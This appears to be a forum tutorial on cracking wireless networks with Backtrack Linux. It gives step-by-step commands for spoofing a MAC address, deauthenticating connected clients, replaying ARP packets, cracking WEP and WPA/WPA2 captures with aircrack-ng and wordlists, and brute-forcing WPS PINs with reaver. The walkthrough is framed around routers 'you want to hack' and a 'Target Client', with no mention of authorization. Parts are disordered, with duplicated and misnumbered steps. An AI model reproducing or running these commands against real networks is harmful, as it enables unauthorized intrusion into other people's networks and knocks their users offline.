What do i need for cracking Wireless Networks? :
Backtrack Linux (http://www.backtrack-linux.org/)
Brain
Computer
Commands
Wireless Card that supports packet injection
Wordlist/s for WPA/WPA2 Enrypted Networks
Which Wireless Cards are supported? :Backtrack Linux (http://www.backtrack-linux.org/)
Brain
Computer
Commands
Wireless Card that supports packet injection
Wordlist/s for WPA/WPA2 Enrypted Networks
Is My Wireless Card Compatible ?
http://www.aircrack-ng.org/doku.php?id=compatible_cards
Which is the best card to buy ?
http://www.aircrack-ng.org/doku.php?id=c…ard_to_buy
I recommend Alfa Wireless Cards
http://www.alfa.com.tw/products_list.php?pc=34
I use the following products without having any troubles :
AWUS036NH
AWUS036NHA
Where can i get Wordlists? :
InsidePro
Packetstormsecurity
Skullsecurity
Alphabetic and numerical Wordlist Generator
#
..
How do i install my Backtrack Linux ISO to a USB Drive/Stick? :
1. Open up http://www.google.com/
2. Search for ‘UNetbootin’
3. Download the program
4. Connect your USB Drive/Stick to your Computer
5. Open the executable you dont have to install it because it is a portable version.
6. Follow the options in this picture
![[Image: A4GEGbH.png]](https://i.imgur.com/A4GEGbH.png)
7. Select your Backtrack Linux Operating System ISO,USB Drive and press ‘OK’
How do i boot the Backtrack Linux Operating System? :
1. Turn off your Compute
2. Connect your USB Drive/Stick to your Computer
3. Turn on your Computer and enter ‘Boot Menu’ or ‘BIOS’ by pressing F1,F2,DEL,ESC or F10
4. Change boot priority to USB Drive/Stick
5. Save BIOS Settings and reboot if necessary
6. Boot Backtrack Linux
7. When your Screen freezes/stands still enter the following to the command line : startx (This Command starts the GUI Graphical Interface)
![[Image: 8vAttE6.png]](https://i.imgur.com/8vAttE6.png)
8. You finally booted Backtrack Linux you’re ready for Cracking Wireless Networks now
How do i change the Mac-Adress of my Wireless Card ? :
1. Open up the Terminal/Console/Command Prompt
![[Image: IJ2faKc.png]](https://i.imgur.com/IJ2faKc.png)
2. Type in ‘airmon-ng’ to see your installed supported Wireless Card/s
Code:
airmon-ng![[Image: t6tyJmU.png]](https://i.imgur.com/t6tyJmU.png)
3. Type in ‘ifconfig <interface> down’ and press enter.
Code:
ifconfig <interface> down
Code:
ifconfig wlan0 down
4. Type in ‘macchanger –mac 00:11:22:33:44:55 <interface>’ and press enter.
Code:
macchanger --mac 00:11:22:33:44:55 <interface>
Code:
macchanger --mac 00:11:22:33:44:55 wlan0
5. Type in ‘ifconfig <interface> up’ and press enter.
Code:
ifconfig <interface> up
Code:
ifconfig wlan0 up![[Image: UCpH233.png]](https://i.imgur.com/UCpH233.png)
1. Type in ‘ifconfig’ and press enter.
Quote:ifconfig
2. Type in ‘ifconfig <interface> down’ and press enter.
Quote:ifconfig <interface> down
Quote:ifconfig wlan0 down
3. Type in ‘macchanger –r <interface>’ and press enter.
Quote:macchanger –r <interface>
Quote:macchanger –r wlan0
4. Type in ‘ifconfig <interface> up’ and press enter.
Quote:ifconfig <interface> up
Code:
ifconfig wlan0 up
How do i monitor/search for Wireless Networks in my area ? :
1. Type in ‘airmon-ng’ and press enter.
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0![[Image: HsF0SxL.png]](https://i.imgur.com/HsF0SxL.png)
![[Image: yB7vHfu.png]](https://i.imgur.com/yB7vHfu.png)
WEP (Wired Equivalent Privacy) : easiest and weakest Encryption, needs no Wordlist to crack
WPA (Wi-Fi Protected Access) : middle and insecure Encryption, needs Wordlist to crack
WPA2 (Wi-Fi Protected Access 2) : hardest and strongest Encryption, needs Wordlist to crack
WEP<WPA<WPA2
WPA2>WPA>WEP
WEP (Wired Equivalent Privacy) Cracking :
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
2. Type in ‘airmon-ng start <interface>’ and press enter.
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface’ and press enter.
Code:
airodump-ng <interface>
Code:
airodump-ng mon0![[Image: RU2urKd.png]](https://i.imgur.com/RU2urKd.png)
–bssid = Macadress of the Router you want to hack
-c = The Communication Channel of the Router you want to hack
-w = The Name of the Capture File for all recorded packets
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w WEP mon0
5. Type in ‘aireplay-ng –fakeauth 0 -a 00:50:F1:12:12:10 <interface>’ and press enter.
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --fakeauth 0 -a 00:23:69:AB:B8:38 mon0
6. Type in ‘aireplay-ng –arpreplay -b 00:23:69:AB:B8:38 <interface>’ and press enter.
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 <interface>
Code:
aireplay-ng --arpreplay -b 00:23:69:AB:B8:38 mon0
7. After collecting more than 30.000 #Data packets you can start cracking the Capture File.
![[Image: urNIXY1.png]](https://i.imgur.com/urNIXY1.png)
8. Type in ‘aircrack-ng -b (bssid) (file name)-01.cap’ and press enter.
Code:
aircrack-ng -b (bssid) (file name)-01.cap
Code:
aircrack-ng -b 00:23:69:AB:B8:38 WEP-01.cap
WPA/2 (Wi-Fi Protected Access) Cracking :
1. Type in ‘airmon-ng’ and press enter.
Code:
airmon-ng
Code:
Bring your card/device in monitor mode with the following command
Code:
airmon-ng start <interface>
Code:
airmon-ng start wlan0
3. Type in ‘airodump-ng <interface>’ and press enter.
Code:
Searching for available Networks with WPA/WPA2 Encryption and connected Clients/Users
Code:
airodump-ng <interface>
Code:
airodump-ng mon0
Code:
After you have found a Network start capturing Network traffic with the following command:
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys <interface>
Code:
airodump-ng --bssid 00:23:69:AB:B8:38 -c 11 -w linksys mon0![[Image: c0niuRy.png]](https://i.imgur.com/c0niuRy.png)
Green = Connected Target Client (Computer,Laptop,Iphone,Smartphone…)
5. Open a new TAB/Console and type in ‘aireplay-ng –deauth 10 -a <bssid of access-point/router> -c <mac-address of client/user> <monitor-interface>
Code:
Open a new Console/Terminal tab and get the Handshake with the following Command:
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB <monitor-interface>
Code:
aireplay-ng --deauth 10 -a 00:23:69:AB:B8:38 -c AC:72:89:47:D7:DB mon0![[Image: EIaqISk.png]](https://i.imgur.com/EIaqISk.png)
![[Image: Mr8TdtM.png]](https://i.imgur.com/Mr8TdtM.png)
Quote:aircrack-ng <filename-01.cap> -w <file path of wordlist> //filepath not needed when wordlist saved in home folder
Quote:aircrack-ng linksys-01.cap -w Wordlist.lst
WPS (Wi-Fi Protected Setup) Cracking :
1. Bring your Wireless Card into the monitor mode.2. Type in ‘wash -i <interface>’ and press enter.
Quote:wash -i <interface>
Code:
wash -i mon0
2. Type in ‘reaver -i <interface> -b <BSSID> -vv’ and press enter.
Code:
reaver -i <interface> -b <BSSID> -vvQuote:reaver -i mon0 -b 00:23:69:AB:B8:38 -vv
3. Type in ‘reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv’ and press enter.
Quote:reaver -i <interface> -c <Channelnumber> -b <BSSID> -S -L -vv
Quote:reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -S -L -vv
4. Type in ‘reaver -i <interface -c <Channelnumber> -b <BSSID> -p <PIN> -vv’ and press enter.
Quote:reaver -i <interface> -c <Channelnumber> -b <BSSID> -p <PIN> -vv
Quote:reaver -i mon0 -c 11 -b 00:23:69:AB:B8:38 -p 12345678(Example) -vv
5. If you have any troubles/problems going through this steps feel free to enter ‘reaver –help’.
Code:
reaver --help
Where are the Capture Files located/storaged at? :
All Capture Files are located at the Home Folder of Backtrack Linux.You only have to open the Dolphin File Manager to see your files.
![[Image: zP2gSec.png]](https://i.imgur.com/zP2gSec.png)
